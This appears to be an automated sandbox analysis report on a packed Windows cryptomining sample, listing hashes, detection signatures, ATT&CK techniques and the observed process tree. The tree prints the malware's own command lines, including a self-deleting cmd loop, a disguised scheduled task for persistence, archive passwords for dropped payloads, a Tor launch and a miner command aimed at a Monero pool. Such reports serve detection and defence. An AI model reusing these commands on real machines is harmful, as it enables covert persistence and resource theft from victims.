8f928095149d31bf6951099b6bf6cd3ac31b21ff50dcbe6aeccdfa5b29c6ab58

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
11-08-2024 10:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
Size

21.3MB
MD5

8a1011b1536554be844258abcfbf35c2
SHA1

8434a6be612dee55d189ac41c0218b3fa4c86099
SHA256

8f928095149d31bf6951099b6bf6cd3ac31b21ff50dcbe6aeccdfa5b29c6ab58
SHA512

7c6e688fc2a18e028f7a5c420a7e2525f37a53f9cc7b65272a6c50a79adf8cf65e774a32f0907cbb8e9f3596bd78e1d4bb9bf3a06a34775410412b75ff0df6b8
SSDEEP

393216:i+j2MW6g3UMSrLNDCy6lvjwTua86Cc5j4XC1ucZkjy8sfDo9Njit:6hvSfpCy6l76P4IlZT8s

Score

7^/10

discovery miner vmprotect

Malware Config

Signatures

Cryptocurrency Miner
Makes network request to known mining pool URL.
miner

Deletes itself 1 IoCs

pid	Process
1984	cmd.exe

Executes dropped EXE 11 IoCs

pid	Process
2760	CL_Debug_Log.txt
2348	Helper.exe
2340	Helper.exe
2988	Helper.exe
320	Helper.exe
2284	tor.exe
1848	Helper.exe
556	Helper.exe
2428	Helper.exe
868	Helper.exe
2340	Helper.exe

Loads dropped DLL 13 IoCs

pid	Process
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2984	taskeng.exe
2984	taskeng.exe
2108	Process not Found
2988	Helper.exe
2988	Helper.exe
2284	tor.exe
2284	tor.exe
2284	tor.exe
2284	tor.exe
2284	tor.exe
2284	tor.exe
796	Process not Found

VMProtect packed file 6 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

resource	yara_rule
behavioral1/memory/2208-15-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect
behavioral1/memory/2208-14-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect
behavioral1/memory/2208-42-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect
behavioral1/memory/2208-46-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect
behavioral1/memory/2208-47-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect
behavioral1/memory/2208-49-0x00000000003F0000-0x0000000002C73000-memory.dmp	vmprotect

AutoIT Executable 8 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/memory/2208-15-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe
behavioral1/memory/2208-14-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe
behavioral1/files/0x0008000000016235-39.dat	autoit_exe
behavioral1/memory/2208-42-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe
behavioral1/memory/2208-46-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe
behavioral1/files/0x0009000000015fd2-43.dat	autoit_exe
behavioral1/memory/2208-47-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe
behavioral1/memory/2208-49-0x00000000003F0000-0x0000000002C73000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 2988 set thread context of 320	2988	Helper.exe	49
PID 2988 set thread context of 2340	2988	Helper.exe	57
PID 2988 set thread context of 1864	2988	Helper.exe	59

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CL_Debug_Log.txt
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Delays execution with timeout.exe 8 IoCs

evasion

pid	Process
2924	timeout.exe
272	timeout.exe
2140	timeout.exe
2088	timeout.exe
2144	timeout.exe
2536	timeout.exe
2420	timeout.exe
2600	timeout.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\winmgmts:\EXCFTDUU\root\CIMV2	Helper.exe
File opened for modification	C:\Users\Admin\AppData\Local\Temp\winmgmts:\EXCFTDUU\root\CIMV2	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2700	schtasks.exe

Script User-Agent 1 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2988	Helper.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

description	pid	Process
Token: SeRestorePrivilege	2760	CL_Debug_Log.txt
Token: 35	2760	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2760	CL_Debug_Log.txt
Token: SeSecurityPrivilege	2760	CL_Debug_Log.txt
Token: SeRestorePrivilege	320	Helper.exe
Token: 35	320	Helper.exe
Token: SeSecurityPrivilege	320	Helper.exe
Token: SeSecurityPrivilege	320	Helper.exe
Token: SeRestorePrivilege	2340	Helper.exe
Token: 35	2340	Helper.exe
Token: SeSecurityPrivilege	2340	Helper.exe
Token: SeSecurityPrivilege	2340	Helper.exe
Token: SeLockMemoryPrivilege	1864	attrib.exe
Token: SeLockMemoryPrivilege	1864	attrib.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2348	Helper.exe
2340	Helper.exe
2348	Helper.exe
2340	Helper.exe
2348	Helper.exe
2340	Helper.exe
2988	Helper.exe
2988	Helper.exe
2988	Helper.exe
556	Helper.exe
556	Helper.exe
556	Helper.exe
1848	Helper.exe
1848	Helper.exe
1848	Helper.exe
2428	Helper.exe
2428	Helper.exe
2428	Helper.exe
868	Helper.exe
868	Helper.exe
868	Helper.exe
1864	attrib.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
2348	Helper.exe
2340	Helper.exe
2348	Helper.exe
2340	Helper.exe
2348	Helper.exe
2340	Helper.exe
2988	Helper.exe
2988	Helper.exe
2988	Helper.exe
556	Helper.exe
556	Helper.exe
556	Helper.exe
1848	Helper.exe
1848	Helper.exe
1848	Helper.exe
2428	Helper.exe
2428	Helper.exe
2428	Helper.exe
868	Helper.exe
868	Helper.exe
868	Helper.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2208 wrote to memory of 2760	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	30
PID 2208 wrote to memory of 2760	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	30
PID 2208 wrote to memory of 2760	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	30
PID 2208 wrote to memory of 2760	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	30
PID 2208 wrote to memory of 2884	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	32
PID 2208 wrote to memory of 2884	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	32
PID 2208 wrote to memory of 2884	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	32
PID 2208 wrote to memory of 2884	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	32
PID 2884 wrote to memory of 2700	2884	cmd.exe	34
PID 2884 wrote to memory of 2700	2884	cmd.exe	34
PID 2884 wrote to memory of 2700	2884	cmd.exe	34
PID 2884 wrote to memory of 2700	2884	cmd.exe	34
PID 2208 wrote to memory of 1984	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	35
PID 2208 wrote to memory of 1984	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	35
PID 2208 wrote to memory of 1984	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	35
PID 2208 wrote to memory of 1984	2208	8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe	35
PID 1984 wrote to memory of 2924	1984	cmd.exe	37
PID 1984 wrote to memory of 2924	1984	cmd.exe	37
PID 1984 wrote to memory of 2924	1984	cmd.exe	37
PID 1984 wrote to memory of 2924	1984	cmd.exe	37
PID 1984 wrote to memory of 272	1984	cmd.exe	38
PID 1984 wrote to memory of 272	1984	cmd.exe	38
PID 1984 wrote to memory of 272	1984	cmd.exe	38
PID 1984 wrote to memory of 272	1984	cmd.exe	38
PID 1984 wrote to memory of 2140	1984	cmd.exe	39
PID 1984 wrote to memory of 2140	1984	cmd.exe	39
PID 1984 wrote to memory of 2140	1984	cmd.exe	39
PID 1984 wrote to memory of 2140	1984	cmd.exe	39
PID 1984 wrote to memory of 2088	1984	cmd.exe	40
PID 1984 wrote to memory of 2088	1984	cmd.exe	40
PID 1984 wrote to memory of 2088	1984	cmd.exe	40
PID 1984 wrote to memory of 2088	1984	cmd.exe	40
PID 1984 wrote to memory of 2144	1984	cmd.exe	41
PID 1984 wrote to memory of 2144	1984	cmd.exe	41
PID 1984 wrote to memory of 2144	1984	cmd.exe	41
PID 1984 wrote to memory of 2144	1984	cmd.exe	41
PID 1984 wrote to memory of 2536	1984	cmd.exe	42
PID 1984 wrote to memory of 2536	1984	cmd.exe	42
PID 1984 wrote to memory of 2536	1984	cmd.exe	42
PID 1984 wrote to memory of 2536	1984	cmd.exe	42
PID 1984 wrote to memory of 2420	1984	cmd.exe	43
PID 1984 wrote to memory of 2420	1984	cmd.exe	43
PID 1984 wrote to memory of 2420	1984	cmd.exe	43
PID 1984 wrote to memory of 2420	1984	cmd.exe	43
PID 1984 wrote to memory of 2600	1984	cmd.exe	44
PID 1984 wrote to memory of 2600	1984	cmd.exe	44
PID 1984 wrote to memory of 2600	1984	cmd.exe	44
PID 1984 wrote to memory of 2600	1984	cmd.exe	44
PID 2984 wrote to memory of 2348	2984	taskeng.exe	46
PID 2984 wrote to memory of 2348	2984	taskeng.exe	46
PID 2984 wrote to memory of 2348	2984	taskeng.exe	46
PID 2984 wrote to memory of 2340	2984	taskeng.exe	47
PID 2984 wrote to memory of 2340	2984	taskeng.exe	47
PID 2984 wrote to memory of 2340	2984	taskeng.exe	47
PID 2348 wrote to memory of 2988	2348	Helper.exe	48
PID 2348 wrote to memory of 2988	2348	Helper.exe	48
PID 2348 wrote to memory of 2988	2348	Helper.exe	48
PID 2988 wrote to memory of 320	2988	Helper.exe	49
PID 2988 wrote to memory of 320	2988	Helper.exe	49
PID 2988 wrote to memory of 320	2988	Helper.exe	49
PID 2988 wrote to memory of 320	2988	Helper.exe	49
PID 2988 wrote to memory of 320	2988	Helper.exe	49
PID 2988 wrote to memory of 2284	2988	Helper.exe	51
PID 2988 wrote to memory of 2284	2988	Helper.exe	51

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
1864	attrib.exe

C:\Users\Admin\AppData\Local\Temp\8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\8a1011b1536554be844258abcfbf35c2_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2208
- C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt
  C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt e -p"JDQJndnqwdnqw2139dn21n3b312idDQDB" "C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt" -o"C:\Users\Admin\AppData\Local\Temp\"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of AdjustPrivilegeToken
  PID:2760
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2884
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks.exe /Create /XML "C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml" /TN "System\SystemCheck"
    3⤵
    - System Location Discovery: System Language Discovery
    - Scheduled Task/Job: Scheduled Task
    PID:2700
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c For /L %i In (0,0,0) Do (del "C:\Users\Admin\AppData\Local\Temp\8A1011~1.EXE"&&timeout /t 0&&if not exist "C:\Users\Admin\AppData\Local\Temp\8A1011~1.EXE" exit)
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1984
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2924
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:272
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2140
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2088
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2144
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2536
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2420
- - C:\Windows\SysWOW64\timeout.exe
    timeout /t 0
    3⤵
    - System Location Discovery: System Language Discovery
    - Delays execution with timeout.exe
    PID:2600

C:\Windows\system32\taskeng.exe
taskeng.exe {278C3039-005D-4D54-ADCA-3A1636FFBD8E} S-1-5-21-2172136094-3310281978-782691160-1000:EXCFTDUU\Admin:Interactive:[1]
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2984
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:2348
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck11343
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:2988
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:320
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor\tor.exe" -f TorConfig
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:2284
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
      7z e -p"DxSqsNKKOxqPrM4Y3xeK" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp" -o"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:2340
  - - C:\Windows\System32\attrib.exe
      -a RX/0 -o stratum+tcp://xmr.pool.minergate.com:45700 -u [email protected] -p x -t 6
      4⤵
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of FindShellTrayWindow
      Views/modifies file attributes
      PID:1864
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2340
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:1848
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck11343
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:868
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe -SystemCheck
  2⤵
  - Executes dropped EXE
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:556
- - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe
    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Helper.exe" -SystemCheck11343
    3⤵
    - Executes dropped EXE
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:2428

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\32.exe

Filesize
7.4MB

MD5
26b75b4d37bb08cec1fc5d3ea5811601

SHA1
39023cd028995a00ab9c93e431d3065831ca845b

SHA256
7ad6e5b47c38acd47dfe591bda623c4cdb9343dfe09768bbcdc733b24f1022ca

SHA512
e0a7f67228d2ba2e26081f09657f010c12d41adb84a739fb3dc7308662f15d5bad07ec68fa84faf218ac06202c4532c1b96210a68404acda71542e0252ffd225

Download Submit
C:\Users\Admin\AppData\Local\Temp\64.exe

Filesize
8.4MB

MD5
819178af950d6d1d909e7a7fd7492fa7

SHA1
3c2ca74ff942ef3719d2f7b0bd65e5db7b932c0e

SHA256
4265a16ef40e0e62387872cf18c34fa78cb868085eabb1aa7c88845f481c6929

SHA512
c1e9fff3b21e35fb39e40bff4131cf060f070a89c2abcdf1ce685473a1b47f698e77e4271018ff0f8ed3fdf605bfb2834e07f7d6efbeb7f65fa9ab9f8d54b4d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\CL_Debug_Log.txt

Filesize
722KB

MD5
43141e85e7c36e31b52b22ab94d5e574

SHA1
cfd7079a9b268d84b856dc668edbb9ab9ef35312

SHA256
ea308c76a2f927b160a143d94072b0dce232e04b751f0c6432a94e05164e716d

SHA512
9119ae7500aa5cccf26a0f18fd8454245347e3c01dabba56a93dbaaab86535e62b1357170758f3b3445b8359e7dd5d37737318a5d8a6047c499d32d5b64126fc

Download Submit
C:\Users\Admin\AppData\Local\Temp\CR_Debug_Log.txt

Filesize
14.6MB

MD5
32c7ee716fcdecbedbf6f7f87c1dae99

SHA1
6a0567f5d93e7b514c6872a1994ac63d2e9600e1

SHA256
db25e5af833dc7790717a492afab27fe16afe7e500ba53eacbfbdbb4fd51342c

SHA512
ce94a67ea9aa4763a2b9d39a878f6bfc7e1fba98ea377201e493f337e32900b5c7a8f7fcfe9ce53c92ec937d12409d236894e1508295a976d5f998fe46868e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\SystemCheck.xml

Filesize
2KB

MD5
9160347bec74471e1a79edfd950629ae

SHA1
c149a7e5aab6e349a70b7b458d0eaaa9d301c790

SHA256
0fe356f3d04bb43f772604b049fd2b20f3038ca2ce84bf9778b8ccdd481d77ab

SHA512
b8061834f658567a1e742496c38688bdecd60191a92163d47470f64aa1fba23e92dd36fa1d2bb7efa36f14002c0606013973718b9f107e62d845a17be4b0d358

Download Submit
C:\Users\Admin\AppData\Local\Temp\asacpiex.dll

Filesize
14.6MB

MD5
aa90895622871d25630893de82655945

SHA1
6d0feacef65ef0bdbac87cd27355135db2bd50c4

SHA256
3fb7953aa1fa0fbf54cb5b16676ee253b5761b6c3b5970a543fd3b5f31d4bab7

SHA512
61122302f35fdebe7c6ff022c83ffe7b2af53d672a69f53d64194a25c19ff006a071461debae6401dd08bff4da0091359d7037cd0da3f01a0a266c0dec8427cb

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
11KB

MD5
30c468dfce6d8e428e139853fc4104e8

SHA1
e6241601852fb1e21dd2c53d03f8751afaa9288c

SHA256
0f5261caae1e6e8bc9318d1b909785affe4e4ef07c3829204668b306cf7ccc94

SHA512
109d48d943ad30ffb63581760872eca227948a1074ec6d4a8f5b366aad507a14a498f6f3fa3bb4e67cf713ab4481eb2609bf15454f09fca2cfbe9ad8faf08c43

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.tmp

Filesize
2.6MB

MD5
21e3778b11e03ced442a1ac73d8949ee

SHA1
9e416a029a3c6e6738cba0d1f69253ca283b73ea

SHA256
03b7f47481eaf1f2c942f4a41a3a6411e22493c2d5b25ab1cab38ffe11cccb76

SHA512
20b91dea4e9f8f9dc8b672be51fb161f1b7a60fac9523921bc084f64c684f688070ec0e01c93f57294a7b13f5ecd33f9eac0eb22acd65b528162bfb08d0bd1a9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SysBackup.txt

Filesize
15.8MB

MD5
7268eb05d51294219569569ea006da2a

SHA1
ade2c0a248f6aae9ff00f42e04dd3d1de242b289

SHA256
188b7e3f0135cf683c393ab88930e93f29d4a0c31c08841237afaf543ecb2e12

SHA512
0056df445e950fc3a76dcb64c4ab8c8b187436d18e95b916b7e83e7e215fa8371bae91501252b1a6e15dbc5414ae674381b758c84a2814d4c88bd856e3deef46

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Tor.tmp

Filesize
2.5MB

MD5
54183220aa6c777f8228474ff5b5df01

SHA1
ed438f17bffb37d42afd61d8dcef0c50d554c65c

SHA256
9a78c80e93bd1ed3d71eb090465e39a69470cd1812fc5e169d8b412e8c665963

SHA512
70b1e22449c5264bed46b62595206e3ad36e2a9c33fa9589acb792d499dcbbae5ebdbf3b35c140e72a7d594f807a6ce1ab925736b5e1a07c17a26445a2591987

